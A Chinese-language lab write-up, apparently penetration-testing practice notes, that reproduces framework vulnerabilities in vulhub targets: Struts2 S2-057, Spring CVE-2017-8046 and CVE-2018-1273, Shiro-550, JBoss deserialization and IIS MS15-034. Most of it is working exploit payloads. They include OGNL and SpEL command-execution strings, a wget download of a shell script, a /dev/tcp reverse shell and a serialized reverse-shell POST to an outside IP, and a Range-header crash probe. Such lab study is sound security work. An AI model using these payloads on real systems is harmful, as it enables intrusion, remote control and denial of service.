常见框架漏洞

S2-057远程执行代码漏洞

环境

vulhub/struts2/s2-057

复现

访问靶场

在url处输入 http://123.57.211.129:8080/struts2-showcase/${(123+123)}/actionChain1.action 后刷新可以看到中间数字位置相加了

​

抓包，将上面验证payload的值修改为我们的利用exp:

/struts2-showcase/$%7B%0A%28%23dm%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29.%28%23ct%3D%23request%5B%27struts.valueStack%27%5D.context%29.%28%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ou%3D%23cr.getInstance%28@com.opensymphony.xwork2.ognl.OgnlUtil@class%29%29.%28%23ou.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ou.getExcludedClasses%28%29.clear%28%29%29.%28%23ct.setMemberAccess%28%23dm%29%29.%28%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27whoami%27%29%29.%28@org.apache.commons.io.IOUtils@toString%28%23a.getInputStream%28%29%29%29%7D/actionChain1.action

​

执行成功

Spring Data Rest 远程命令执行命令(CVE-2017-8046)

环境

vulhub/spring/CVE-2017-8046

复现

1.访问 http://your-ip:8080/customers/1，然后抓取数据包，使用PATCH请求来修改

写入的数据为

[{ "op": "replace" , "path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{116,111,117,99,104,32,47,116,109,112,47,115,117,99,99,101,115,115}))/lastname" , "value": "vulhub" }]

其中 new byte[]{116,111,117,99,104,32,47,116,109,112,47,115,117,99,99,101,115,11

5} 表示的命令 touch /tmp/success ⾥⾯的数字是ascii码

查看dock容器下的文件，发现成功写入

完成

spring 代码执⾏ （CVE-2018-1273）

环境

vulhub/spring/CVE-2018-1273

复现

访问靶场地址： http:// 47.121.212.195:8080 /users

填写注册信息，bp抓包：

加上 poc ：

username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("t

ouch /tmp/crz")]=&password=&repeatedPassword=

进⼊终端查看，可以看到成功写⼊：

docker exec -it 5fb01f48678a /bin/bash

Shiro rememberMe反序列化漏洞(Shiro-550)

环境

vulhub/shiro/CVE-2016-4437

复现

验证Shiro框架

​

利⽤shiro_attack⼯具，命令执⾏

添加【目标地址】--》【爆破密钥】--》【爆破利用链及回显】

​

反弹shell

使用命令执行执行

/usr/bin/wget -qO /tmp/shell.sh http://123.57.211.129/shell.sh

​

在靶场中生成shell.sh文件

sh -i >& /dev/tcp/123.57.211.129/6666 0>&1

​

监听6666端口

​

执行shell.sh文件

/bin/bash /tmp/shell.sh

​

反弹成功

​

JBoss EJBInvokerServlet CVE-2013-4810 反序列化漏洞

环境

vulhub/jboss/JMXInvokerServlet-deserialization

复现

此漏洞存在于JBoss中 /invoker/JMXInvokerServlet 路径。访问若提示下载

JMXInvokerServlet，则可能存在漏洞：

​

使⽤JavaDeserH2HC进⾏反弹shell

#创建class⽂件

javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHa

shMap.java

#创建反序列化⽂件

java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap 123.57.211.129:6666

#监听 6666 端⼝

nc -lvvp 6666

#psot提交

curl http://123.57.211.129:8080/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser

创建class⽂件

​

创建反序列化⽂件

​

监听6666端⼝

​

psot提交

​

完成

HTTP.SYS远程代码执⾏(MS15-034) MS-->Microsoft 2015 -034

环境

windows server 2012 IIS8.5

复现

访问⽹站；

主⻚图⽚ iis8.5的是（iis-85.png），其他的可以根据百度查，每个版本的欢迎⻚都不⼀样

编辑请求头，增加Range: bytes=0-18446744073709551615字段，若返回码状态为416 Requested Range Not Satisfiable，则存在HTTP.SYS远程代码执⾏漏洞。

POC： https://github.com/davidjura/MS15-034-IIS-Active-DoS-Exploit-PoC

这时候就可以看到虚拟机已经变卡了，甚⾄蓝屏。